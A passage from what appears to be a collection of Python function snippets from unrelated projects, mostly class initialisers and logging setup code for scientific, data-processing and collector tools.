self.fixedgap = config.get('profiles', 'fixedgap')\n \n if preload: \n self.load_data()\n self.load_x()\n self.load_y()\n self.load_z()\n self.load_p()\n self.load_pn()\n self.load_ir()\n self.load_ps()\n self.load_psalqc()\n self.load_qc()\n self.load_posqc()", "def __init__(\n self, path=\"logger.yml\", default_level=logging.INFO, env_key=\"LOG_CFG\"\n ):\n\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(os.path.normpath(path)):\n with open(path, \"rt\") as f:\n config = yaml.safe_load(f.read())\n to_log = \"\"\n # If directory is non existent create it\n # Todo: Here a dir will be made after installation, so if this prohibited go to the other dir\n if \"file\" in config[\"handlers\"]:\n pathtologfile = os.path.normpath(config[\"handlers\"][\"file\"][\"filename\"]).split(os.sep)\n if not os.path.isdir(\n os.path.join(os.getcwd(), *pathtologfile[:-1])\n ):\n os.mkdir(os.path.join(os.getcwd(), *pathtologfile[:-1]))\n else:\n to_log = (\n \"Logging to file failed, since no file handler was defined!\"\n )\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n\n self.log_LEVELS = {\n \"NOTSET\": 0,\n \"DEBUG\": 10,\n \"INFO\": 20,\n \"WARNING\": 30,\n \"ERROR\": 40,\n \"CRITICAL\": 50,\n }\n\n self.welcome_string = (\n \"\\n\"\n \" __ ______ ______ ______ __ __ ______ \\n\" \n \" /\\ \\ /\\ __ \\ /\\ ___\\ /\\ ___\\ /\\ \\ /\\ \\ /\\ ___\\ \\n\" \n \" \\ \\ \\____ \\ \\ \\/\\ \\ \\ \\ \\__ \\ \\ \\ __\\ \\ \\ \\ \\ \\ \\____ \\ \\ __\\ \\n\" \n \" \\ \\_____\\ \\ \\_____\\ \\ \\_____\\ \\ \\_\\ \\ \\_\\ \\ \\_____\\ \\ \\_____\\ \\n\" \n \" \\/_____/ \\/_____/ \\/_____/ \\/_/ \\/_/ \\/_____/ \\/_____/\\n\\n\\n\"\n )\n\n snoopy = (\"\\n\\n\\n XXXX\\n\"\n \" X XX\\n\"\n \" X *** X XXXXX\\n\"\n \" X ***** X XXX XX\\n\"\n \" XXXX ******* XXX XXXX XX\\n\"\n \" XX X ****** XXXXXXXXX XX XXX\\n\"\n \" XX X **** X X** X\\n\"\n\" X XX XX X X***X\\n\"\n\" X //XXXX X XXXX\\n\"\n\" X // X XX\\n\"\n\"X // X XXXXXXXXXXXXXXXXXX/ \\n\"\n\"X XXX// X X\\n\"\n\"X X X X X\\n\"\n\"X X X X X\\n\"\n\" X X X X X XX\\n\"\n\" X X X X X XXX XX\\n\"\n\" X XXX X X X X X X\\n\"\n\" X X X XX X XXXX\\n\"\n\" X X XXXXXXXX/ XX XX X\\n\"\n\" XX XX X X X XX\\n\"\n\" XX XXXX XXXXXX/ X XXXX\\n\"\n\" XXX XX*** X X\\n\"\n\" XXXXXXXXXXXXX * * X X\\n\"\n\" *---* X X X\\n\"\n\" *-* * XXX X X\\n\"\n\" *- * XXX X\\n\"\n\" *- *X XXX\\n\"\n\" *- *X X XXX\\n\"\n\" *- *X X XX\\n\"\n\" *- *XX X X\\n\"\n\" * *X* X X X\\n\"\n\" * *X * X X X\\n\"\n\" * * X** X XXXX X\\n\"\n\" * * X** XX X X\\n\"\n\" * ** X** X XX X\\n\"\n\" * ** X* XXX X X\\n\"\n\" * ** XX XXXX XXX\\n\"\n\" * * * XXXX X X\\n\"\n\" * * * X X X\\n\"\n\" >>>>>>>******* * * X X XXXXXXXX/ \\n\"\n\" * * * /XXXXX XXXXXXXX/ <\\n\"\n\" >>>>>********** * X < / <\\n\"\n\" >>>>* * X / / <XXXXX\\n\"\n\">>>>>>>>>********** XXXXXXXXXXXXXXXXXXXXXX\\n\")\n\n # Create a logger Object\n self.LOG = logging.getLogger(\"Logfile\")\n # Print welcome message\n self.LOG.info(self.welcome_string)\n self.LOG.debug(snoopy)\n if to_log:\n self.LOG.info(to_log)", "def __init__(self, exp_params, stamp_unique=True):\n self._main_thread = True\n self.params = copy.deepcopy(exp_params)\n self.params['class'] = self.__class__.__name__\n self._check_required_params()\n self.__check_exist_path()\n self.__create_folder(stamp_unique)\n set_experiment_logger(self.params['path_exp'], FILE_LOGS)\n # set stream logging to info level\n for lh in logging.getLogger().handlers:\n if isinstance(lh, logging.StreamHandler) and \\\n not isinstance(lh, 
logging.FileHandler):\n lh.setLevel(logging.INFO)\n logging.info('initialise experiment...')\n logging.info(string_dict(self.params, 'PARAMETERS:'))\n logging.info('COMPUTER: %r', computer_info())", "def __build__(self,data_index=0):\n \n super(Image,self).__build__()\n # -- How to read the image\n self._build_properties = dict(\n data_index = data_index,\n header_exptime = \"EXPTIME\",\n dataslice0=\"undefined\",\n dataslice1=\"undefined\",\n bkgdbox={\"bh\":100,\"bw\":100,\"fh\":3,\"fw\":3},\n )", "def init(self):\n self.filename, file_extension = os.path.splitext(os.path.basename(__file__))\n\n # parse argument\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--configdir\", help=\"your config.ini directory\", type=str)\n parser.add_argument(\"--logdir\", help=\"your log directory\", type=str)\n args = parser.parse_args()\n\n # determine config directory\n if args.configdir:\n config_file = os.path.join(args.configdir, 'config.ini')\n else:\n config_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../config', 'config.ini')\n\n if args.logdir:\n log_file = os.path.join(args.logdir, '%s.log' % self.filename)\n else:\n log_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../logs', '%s.log' % self.filename)\n\n # load config\n self.config = configparser.ConfigParser()\n self.config.read(config_file)\n\n # init logger\n logbook.set_datetime_format(\"local\")\n self.logger = logbook.Logger(name=self.filename)\n format_string = '%s %s' % ('[{record.time:%Y-%m-%d %H:%M:%S.%f%z}] {record.level_name}',\n '{record.module}:{record.lineno}: {record.message}')\n if self.config.has_option('handler_stream_handler', 'verbose'):\n log_handler = logbook.StreamHandler(sys.stdout, level=self.config.get('Logger', 'level'), bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n log_handler = logbook.TimedRotatingFileHandler(log_file, level=self.config.get('Logger', 'level'),\n date_format='%Y%m%d', backup_count=5, bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n else:\n log_handler = logbook.TimedRotatingFileHandler(log_file, level=self.config.get('Logger', 'level'),\n date_format='%Y%m%d', backup_count=5, bubble=True,\n format_string=format_string)\n self.logger.handlers.append(log_handler)\n\n # init database\n self.db = AdhocDatabaseHandler.instantiate_from_configparser(self.config, self.logger)", "def __init__(self, args, logger: MainLogger, log_start_t=0):\n\n super().__init__(args, logger)\n self.batch_size = self.args.batch_size_run\n assert self.batch_size == 1\n\n self.env = env_REGISTRY[self.args.env](**self.args.env_args)\n # Find id of the first policy team - Only supported for one policy team in the build plan\n teams = args.env_args[\"match_build_plan\"]\n self.policy_team_id = get_policy_team_id(teams)\n if self.args.headless_controls:\n controls = HeadlessControls(env=self.env)\n controls.daemon = True\n controls.start()\n\n self.episode_limit = self.env.episode_limit\n self.t = 0 # current time step within the episode\n self.log_start_t = log_start_t # timestep to start logging from\n self.t_env = 0 # total time steps for this runner in the provided environment across multiple episodes\n self.phi: FeatureFunction = feature_func_REGISTRY[self.args.sfs] if self.args.sfs else None\n self.home_batch = None\n self.home_mac = None\n self.new_batch_fn = None", "def __init__(self, pyconfig):\n self.pylot_cfg = pyconfig\n self.logfile = pyconfig.dir_logs + 'Pylot.log'", "def 
__init__(self, samples, obs, nPlanets=0, nOffsets=0, nImportSamps=10000, scale=1.0, pRatio=1., slope=False):\n\n self.samples = samples\n self.nPlanets = nPlanets\n self.nOffsets = nOffsets\n self.nImportSamps = nImportSamps\n self.scale = scale\n self.pRatio = pRatio\n self.slope = slope\n\n param_keys, param_IS_keys = create.dict_keys(self.nPlanets, self.nOffsets, slope=self.slope)\n print(param_keys)\n print(param_IS_keys)\n postSamp, nPostSamples = create.posterior_samples_from_emcee(self.samples, param_keys)\n\n postSamp_pKhkl = compute.pKewM_to_importSamp_parameterization(postSamp, param_IS_keys, self.nPlanets)\n\n self.mediansG, self.covMatrixG, self.choleskyDecomp, self.logDetSigmaG = compute.matrix_info(postSamp_pKhkl)\n\n nParams = len(param_IS_keys)\n random_values = [ truncnorm.rvs(-self.scale, self.scale, size=nParams) for i in range(self.nImportSamps) ]\n\n samples = [ [] for i in range(self.nImportSamps) ]\n g_samples = [ [] for i in range(self.nImportSamps) ]\n loggs = [ 0. for i in range(self.nImportSamps) ]\n\n print(\"## Drawing importance samples...\")\n\n for x in range(self.nImportSamps):\n dispersion = np.dot( self.choleskyDecomp, np.transpose(random_values[x]) )\n samples[x] = self.mediansG + dispersion\n g_samples[x] = list(samples[x])\n\n diff = np.subtract(samples[x],self.mediansG)\n\n logg = -0.5 * (nParams*np.log(2.*np.pi) + self.logDetSigmaG + \\\n np.dot( np.transpose(diff), \\\n np.linalg.solve(self.covMatrixG, np.subtract(samples[x],self.mediansG) ) ) ) - \\\n nParams*np.log(erf(self.scale/np.sqrt(2.)))\n loggs[x] = logg\n\n print(\"## Done drawing importance samples!\")\n print(\"\")\n \n g_samples_T = np.transpose(g_samples)\n importSamp_dict = OrderedDict()\n\n for i, item in enumerate(g_samples_T):\n importSamp_dict[param_IS_keys[i]] = item\n\n importSamp_pKhkl_dict = compute.importSamp_parameterization_to_pKewM(importSamp_dict, param_keys, self.nPlanets, self.pRatio)\n importSamp_pKewM = np.transpose([ vals for key, vals in importSamp_pKhkl_dict.items() ])\n\n print(\"## Evaluating lnpost at importance samples...\")\n\n logPosteriors = np.array([ np.nan for i in range(self.nImportSamps) ])\n for i in range(nImportSamps):\n logPosteriors[i] = lnpost(importSamp_pKewM[i], obs, self.nPlanets, slope=self.slope)\n\n print(\"## Done evaluating lnpost!\")\n print(\"\")\n\n\n logSum = -(9.**99.)\n\n for i in range(self.nImportSamps): \n diff = logPosteriors[i] - loggs[i]\n\n logSum = np.logaddexp(logSum, diff)\n if i%1000==0:\n print(str(i+1) + \" \" + str(logSum - np.log(i+1)))\n \n self.logAvg = logSum - np.log(self.nImportSamps)\n self.f_MCMC = 0.\n\n print(\"\")\n print(\"## logAvg: \" + str(self.logAvg))\n\n postSamp_wo_keys = []\n for key in postSamp_pKhkl:\n postSamp_wo_keys.append(postSamp_pKhkl[key])\n \n postSamp_wo_keys = np.transpose(np.array(postSamp_wo_keys))\n diff = postSamp_wo_keys-self.mediansG\n\n for j in range(nPostSamples):\n\n z = np.linalg.solve(self.choleskyDecomp, diff[j])\n\n if all([abs(k)<=scale for k in z]):\n self.f_MCMC += 1.\n else:\n self.f_MCMC += 0.\n \n self.f_MCMC = self.f_MCMC/nPostSamples\n self.logFML = self.logAvg - np.log(self.f_MCMC)\n\n print(\"## f_MCMC: \" + str(self.f_MCMC))\n print(\"## logFML: \" + str(self.logFML))\n\n print(\"## FML computed!\")\n print(\"## Done!\")", "def __init__(self, start_time, forcing_step_seconds, forcing_num_steps,\n xname, yname, xsize, ysize, input_directory, output_directory,\n work_directory, template_directory, input_file_pattern,\n archive_directory, strict=True):\n 
self.start_time = start_time\n self.forcing_num_steps = forcing_num_steps\n self.forcing_step_seconds = forcing_step_seconds\n self.xname = xname\n self.yname = yname\n # Grid must have positive sizes in x and y directions.\n if strict and (xsize <= 0 or ysize <= 0):\n msg = 'Grid sizes must be >= 1, got xsize={} and ysize={}.'\n raise ConfigurationError(msg.format(xsize, ysize))\n self.xsize = xsize\n self.ysize = ysize\n # The input and template directories are required to exist, the output\n # and work directories may be able to be created when required.\n if strict and not os.path.exists(input_directory):\n msg = 'The input directory \"{}\" does not exist.'\n raise ConfigurationError(msg.format(input_directory))\n self.input_directory = input_directory\n if strict and not os.path.exists(template_directory):\n msg = 'The template directory \"{}\" does not exist.'\n raise ConfigurationError(msg.format(template_directory))\n self.template_directory = template_directory\n self.work_directory = work_directory\n self.output_directory = output_directory\n self.input_file_pattern = input_file_pattern\n self.archive_directory = archive_directory", "def setup(self, cfg):\n super().setup(cfg)\n\n \"\"\"\n TODO override the date format to ISOsomething standard...\n \"\"\"\n #general_fmt = r\"%(asctime)s [%(process)3d] [%(levelname)-7s] %(message)s\"\n #Gunicorn 'access' somehow has a very different requestion context. So the ip getting is left out, it is inserted by access below\n general_formatter = RequestFormatter(\n '[%(asctime)s] [%(base_hostname)s:%(hostname)s:%(process)3d] [%(levelname)-7s] %(message)s'\n )\n #print(self.cfg.access_log_format)\n #self.cfg.access_log_format = general_fmt\n\n # Override Gunicorn's `error_log` configuration.\n self._set_handler( self.error_log, cfg.errorlog, general_formatter )\n\n #Push the general format at our the access formatter, which will publish specialised messages\n self._set_handler( self.access_log, cfg.accesslog, general_formatter )", "def __init__(self, name, config):\n self.name = name\n self.config = config\n self.logger = logging.getLogger(name)\n if 'type' not in config:\n self.config['type'] = DEFAULT_BACKUP_TYPE\n elif config['type'] not in SUPPORTED_BACKUP_TYPES:\n self.logger.error('Unknown dump type: %s', config['type'])\n sys.exit(-1)\n if 'retention' not in config:\n self.config['retention'] = DEFAULT_RETENTION_DAYS\n else:\n self.config['retention'] = int(config['retention'])", "def __setup_logging(self):\n\n loglevel = logging.INFO\n if self.config[\"verbose\"]:\n loglevel = logging.DEBUG\n\n FORMAT = '[%(asctime)s %(filename)s:%(lineno)s %(levelname)s] %(message)s'\n if self.config[\"log\"]:\n logging.basicConfig(format=FORMAT, level=loglevel, filename=self.config[\"log\"])\n else:\n logging.basicConfig(format=FORMAT, level=loglevel)", "def __init__(self, input_xml=None, pointing_file=None, datatype='linear', reffile_defaults='crds',\n reffile_overrides=None, use_JWST_pipeline=True, catalogs=None, cosmic_rays=None,\n background=None, roll_angle=None, dates=None,\n observation_list_file=None, verbose=False, output_dir='./', simdata_output_dir='./',\n dateobs_for_background=False, segmap_flux_limit=None, segmap_flux_limit_units=None,\n add_ghosts=True, convolve_ghosts_with_psf=False, convolve_extended_with_psf=True,\n offline=False):\n # Initialize log\n self.logger = logging.getLogger('mirage.yaml.yaml_generator')\n self.logger.info('Running yaml_generator....\\n')\n self.logger.info('using APT xml file: {}\\n'.format(input_xml))\n 
self.logger.info('Original log file name: ./{}'.format(STANDARD_LOGFILE_NAME))\n\n parameter_overrides = {'cosmic_rays': cosmic_rays, 'background': background, 'roll_angle': roll_angle,\n 'dates': dates}\n\n self.info = {}\n self.input_xml = input_xml\n self.pointing_file = pointing_file\n self.datatype = datatype\n self.use_JWST_pipeline = use_JWST_pipeline\n self.observation_list_file = observation_list_file\n self.verbose = verbose\n self.output_dir = output_dir\n self.simdata_output_dir = simdata_output_dir\n if reffile_defaults in ['crds', 'crds_full_name']:\n self.reffile_defaults = reffile_defaults\n else:\n raise ValueError(\"reffile_defaults must be 'crds' or 'crds_full_name'\")\n self.reffile_overrides = reffile_overrides\n\n self.catalogs = catalogs\n self.table_file = None\n self.use_nonstsci_names = False\n self.use_linearized_darks = True\n self.psfwfe = 'predicted'\n self.psfwfegroup = 0\n self.resets_bet_ints = 1 # NIRCam should be 1\n self.psf_paths = None\n self.expand_catalog_for_segments = False\n self.dateobs_for_background = dateobs_for_background\n self.add_psf_wings = True\n self.add_ghosts = add_ghosts\n self.convolve_ghosts = convolve_ghosts_with_psf\n self.convolve_extended = convolve_extended_with_psf\n self.offline = offline\n\n if ((segmap_flux_limit is not None) and (segmap_flux_limit_units is None)):\n raise ValueError(\"If segmap_flux_limit is provided, segmap_flux_units must also be provided.\")\n\n if segmap_flux_limit is None:\n self.segmentation_threshold = SEGMENTATION_MIN_SIGNAL_RATE\n else:\n self.segmentation_threshold = segmap_flux_limit\n if segmap_flux_limit_units is None:\n self.segmentation_threshold_units = 'ADU/sec'\n else:\n self.segmentation_threshold_units = segmap_flux_limit_units\n\n # Expand the MIRAGE_DATA environment variable\n self.datadir = expand_environment_variable(ENV_VAR, offline=self.offline)\n\n # Check that CRDS-related environment variables are set correctly\n self.crds_datadir = crds_tools.env_variables()\n\n # Get the path to the 'MIRAGE' package\n self.modpath = pkg_resources.resource_filename('mirage', '')\n\n self.config_information = utils.organize_config_files(offline=self.offline)\n\n self.path_defs()\n\n if (input_xml is not None):\n if self.observation_list_file is None:\n self.observation_list_file = os.path.join(self.output_dir, 'observation_list.yaml')\n self.apt_xml_dict, self.xml_skipped_observations = get_observation_dict(self.input_xml, self.observation_list_file, catalogs,\n verbose=self.verbose,\n parameter_overrides=parameter_overrides)\n else:\n self.logger.error('No input xml file provided. 
Observation dictionary not constructed.')\n\n self.reffile_setup()", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timestamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10,# Ten should be enough to debug but not use too much storage\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(config.console_log_level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timestamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10000,# Ten thousand should be enough to crash before we reach it.\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n 
logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def analyse_screening_setup(self):\n\n control = self.control\n logger: LoggerProperties\n\n # Perform some input checks\n # Check project path exists\n if control.project_path == \"\":\n msg = \"Cannot process: Project location not set.\"\n raise LoggerWarning(msg)\n\n # Check at least one logger exists\n if not control.loggers:\n msg = \"Cannot process: No loggers exist in setup.\"\n raise LoggerWarning(msg)\n\n # Check all ids are unique\n control.check_logger_ids()\n\n # Check logging durations and sample lengths are positive\n enabled_loggers = (logger for logger in control.loggers if logger.enabled)\n for logger in enabled_loggers:\n if logger.duration <= 0:\n msg = (f\"Cannot process: Logging duration for logger {logger.logger_id} is {logger.duration}.\\n\"\n f\"Logging duration must be greater than zero.\")\n raise LoggerWarning(msg)\n\n # TODO: Move to logger properties as a setup function\n if control.global_process_stats is True and logger.process_stats is True:\n if logger.stats_interval <= 0:\n msg = (f\"Cannot process: Statistics sample length for logger \"\n f\"{logger.logger_id} is {logger.stats_interval}.\\n\"\n f\"Statistics sample length must be greater than zero.\")\n raise LoggerWarning(msg)\n\n if control.global_process_spect is True and logger.process_spect is True:\n if logger.spect_interval <= 0:\n msg = (f\"Cannot process: Spectral sample length for logger \"\n f\"{logger.logger_id} is {logger.spect_interval}.\\n\"\n f\"Spectral sample length must be greater than zero.\")\n raise LoggerWarning(msg)\n\n # Paths to output folders\n control.set_output_paths()\n\n # Get raw filenames, check timestamps and select files in processing datetime range\n enabled_loggers = (logger for logger in control.loggers if logger.enabled)\n for logger in enabled_loggers:\n # Store logger filenames and check file timestamps\n self.statusbar.showMessage(\n f\"Checking setup: Checking file names for {logger.logger_id}. 
Please wait...\"\n )\n self.repaint()\n logger.get_filenames()\n\n # Select files to process and, if applicable, check file timestamps are valid\n logger.set_files_to_process()\n\n # Store expected file length\n logger.expected_data_points = logger.freq * logger.duration\n\n # Get all channel names and units if not already stored in logger object\n if len(logger.all_channel_names) == 0 and len(logger.all_channel_units) == 0:\n logger.get_all_columns()\n\n # Update column list in config dashboard if this logger is the one selected\n if logger.logger_id == self.inputDataModule.loggerList.currentItem().text():\n self.inputDataModule.set_logger_columns_list(logger)\n\n # Check requested channels exist\n # Connect warning signal to warning message box in DataLab class\n try:\n # Disconnect any existing connection to prevent repeated triggerings\n logger.logger_warning_signal.disconnect()\n except TypeError:\n pass\n logger.logger_warning_signal.connect(self.warning)\n\n # Set processed channel names and units as user values, if supplied, or file header values\n logger.set_selected_column_and_units_names()\n\n # Check for any columns without any units set and see if the units is embedded in the channel name;\n # if so extract units from channel name and add to units list\n logger.check_if_units_in_channel_name()\n\n # Check number of headers match number of columns to process\n # TODO: This should already have been enforced earlier so perhaps no longer required?\n logger.check_headers()", "def __init__(self, *args, **kwargs):\r\n super().__init__()\r\n self._cfg = ConfigDict() # current configuration\r\n self._default_config = ConfigDict() # default configuration\r\n self._temp_config = OrderedDict() # temporary configuration\r\n self._path = Path() # current configuration path\r\n self._default_path = Path() # default configuration path\r\n self._conversion_dict = None\r\n self._auto_cast = None\r\n self._write_flags = None\r\n self._force_load = None\r\n self._load_empty = None\r\n self._ask_path = None\r\n self._search_in_default_config = None\r\n self._init_count = 0\r\n self._policies = defaultdict(bool) # by default every modification is forbidden # WIP\r\n if args or kwargs:\r\n self.init(*args, **kwargs)\r\n logger.debug(\"Config object created.\")", "def createPostageStamp(imageArray, objectStartArr, velArr,\n timeArr, stamp_width):\n\n singleImagesArray = []\n stampWidth = np.array(stamp_width, dtype=int)\n #print stampWidth\n stampImage = np.zeros(stampWidth)\n \n #if len(np.shape(imageArray)) < 3:\n # imageArray = [imageArray]\n \n measureCoords = calcCenters(np.array(objectStartArr), np.array(velArr), timeArr)\n \n if len(np.shape(measureCoords)) < 2:\n measureCoords = [measureCoords]\n off_edge = []\n for centerCoords in measureCoords:\n if (centerCoords[0] + stampWidth[0]/2 + 1) > np.shape(imageArray[0].science())[1]:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[0] - stampWidth[0]/2) < 0:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[1] + stampWidth[1]/2 + 1) > np.shape(imageArray[0].science())[0]:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n elif (centerCoords[1] - stampWidth[1]/2) < 0:\n #raise ValueError('The boundaries of your postage stamp for one of the images go off the edge')\n off_edge.append(True)\n 
else:\n off_edge.append(False)\n \n i=0\n for image in imageArray:\n if off_edge[i] is False:\n xmin = int(np.rint(measureCoords[i,1]-stampWidth[0]/2))\n xmax = int(xmin + stampWidth[0])\n ymin = int(np.rint(measureCoords[i,0]-stampWidth[1]/2))\n ymax = int(ymin + stampWidth[1])\n #print xmin, xmax, ymin, ymax\n single_stamp = image.science()[xmin:xmax, ymin:ymax]\n single_stamp[np.isnan(single_stamp)] = 0.\n single_stamp[np.isinf(single_stamp)] = 0.\n stampImage += single_stamp\n singleImagesArray.append(single_stamp)\n else:\n single_stamp = np.zeros((stampWidth))\n singleImagesArray.append(single_stamp)\n \n i+=1\n return stampImage, singleImagesArray", "def __init__(self, dat, frame, box_size, centre,\n arrow_width=_arrow_width,\n arrow_head_width=_arrow_head_width,\n arrow_head_length=_arrow_head_length,\n pad=_colormap_label_pad,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre,\n arrow_width=arrow_width,\n arrow_head_width=arrow_head_width,\n arrow_head_length=arrow_head_length) # initialise superclass\n\n self.velocities = dat.getVelocities(frame, *self.particles) # particles' displacements at frame\n\n self.vmin, self.vmax = amplogwidth(self.velocities)\n try:\n self.vmin = np.log10(kwargs['vmin'])\n except (KeyError, AttributeError): pass # 'vmin' not in keyword arguments or None\n try:\n self.vmax = np.log10(kwargs['vmax'])\n except (KeyError, AttributeError): pass # 'vmax' not in keyword arguments or None\n\n self.colorbar(self.vmin, self.vmax) # add colorbar to figure\n self.colormap.set_label( # colorbar legend\n r'$\\log_{10}||\\vec{v}_i(t)||$',\n labelpad=pad, rotation=270)\n\n self.label = label # write labels\n\n self.draw()", "def __init__(self, checkpoint_dir: str, **kwargs):\n assert type(checkpoint_dir) is str\n self.checkpoint_dir, self.parameter, self.is_trained = self.version(checkpoint_dir, parameter=kwargs)\n logging.info('checkpoint: {}'.format(self.checkpoint_dir))\n for k, v in self.parameter.items():\n logging.info(' - [arg] {}: {}'.format(k, str(v)))\n self.__dict__.update(self.parameter)", "def __init__(self,\n top_k=None, # type: Optional[int]\n conf_threshold=None, # type: Optional[thelper.typedefs.Number]\n iou_threshold=None, # type: Optional[thelper.typedefs.Number]\n class_names=None, # type: Optional[List[AnyStr]]\n target_name=None, # type: Optional[AnyStr]\n viz_count=0, # type: int\n report_count=None, # type: Optional[int]\n log_keys=None, # type: Optional[List[AnyStr]]\n format=None, # type: Optional[AnyStr]\n ): # type: (...) 
-> None\n assert top_k is None or isinstance(top_k, int) and top_k > 0, \"invalid top-k value\"\n assert conf_threshold is None or (isinstance(conf_threshold, (float, int)) and 0 <= conf_threshold <= 1), \\\n \"detection confidence threshold should be 'None' or number in [0, 1]\"\n assert iou_threshold is None or (isinstance(iou_threshold, (int, float)) and 0 <= iou_threshold <= 1), \\\n \"detection IoU threshold should be 'None' or number in [0, 1]\"\n assert isinstance(viz_count, int) and viz_count >= 0, \"invalid image count to visualize\"\n assert report_count is None or (\n isinstance(report_count, int) and report_count >= 0), \"invalid report sample count\"\n assert log_keys is None or isinstance(log_keys, list), \"invalid list of sample keys to log\"\n self.top_k = top_k\n self.target_name = target_name\n self.target_idx = None\n self.conf_threshold = conf_threshold\n self.iou_threshold = iou_threshold\n self.viz_count = viz_count\n self.report_count = report_count\n self.log_keys = log_keys if log_keys is not None else []\n self.bbox = None # type: Optional[thelper.typedefs.DetectionPredictionType]\n self.true = None # type: Optional[thelper.typedefs.DetectionTargetType]\n self.meta = None # type: Optional[Dict[AnyStr, List[Any]]]\n ClassNamesHandler.__init__(self, class_names)\n FormatHandler.__init__(self, format)", "def __init__(\n self,\n robot_state=None,\n robot_timestamp=None,\n measure_timestamp=None,\n point_cloud=None):\n\n self.robot_state = robot_state\n self.robot_timestamp = robot_timestamp\n self.point_cloud = point_cloud\n self.measure_timestamp = measure_timestamp", "def __init__(self, config):\n super().__init__(config)\n\n # Prepare the timer.\n self.timer = 0\n\n # Set the current player index.\n self.current_player_index = 0\n # If we are the client, the server goes first.\n for i in range(len(sys.argv)):\n if sys.argv[i] == \"--client\":\n self.current_player_index = 1\n\n # Prepare the phase counter.\n self.__current_phase = Game.PHASE_PREPARE\n # Prepare the shot location store.\n self.__current_fire_location = None\n self.__current_fire_effect = None", "def __init__(self, beaver_config, file_config, logger=None):\n self._current_host = beaver_config.get('hostname')\n self._file_config = file_config\n\n if beaver_config.get('format') == 'msgpack':\n import msgpack\n packer = msgpack.Packer()\n self._formatter = packer.pack\n elif beaver_config.get('format') == 'json':\n # priority: ujson > simplejson > jsonlib2 > json\n priority = ['ujson', 'simplejson', 'jsonlib2', 'json']\n for mod in priority:\n try:\n json = __import__(mod)\n self._formatter = json.dumps\n except ImportError:\n pass\n else:\n break\n elif beaver_config.get('format') == 'string':\n def string_formatter(data):\n return \"[{0}] [{1}] {2}\".format(data['@source_host'], data['@timestamp'], data['@message'])\n self._formatter = string_formatter\n else:\n def null_formatter(data):\n return data['@message']\n self._formatter = null_formatter", "def __init__(self):\n super(GithubCollector, self).__init__()\n config_file = ('collectors.cfg')\n log_file = self.config['Github']['log_file']\n logging.config.fileConfig(config_file,\n defaults={'GithubCollector': log_file}\n )\n self.logger = logging.getLogger('GithubCollector')\n self.elasticsearch = Elasticsearch(['localhost:9200'])\n self.redis = redis.Redis(host='127.0.0.1', port=6379, password='')\n self.timestamp = datetime.date.today().isoformat()", "def __init__(self, **kwargs):\n self.postKey = kwargs.get(\"postKey\")\n 
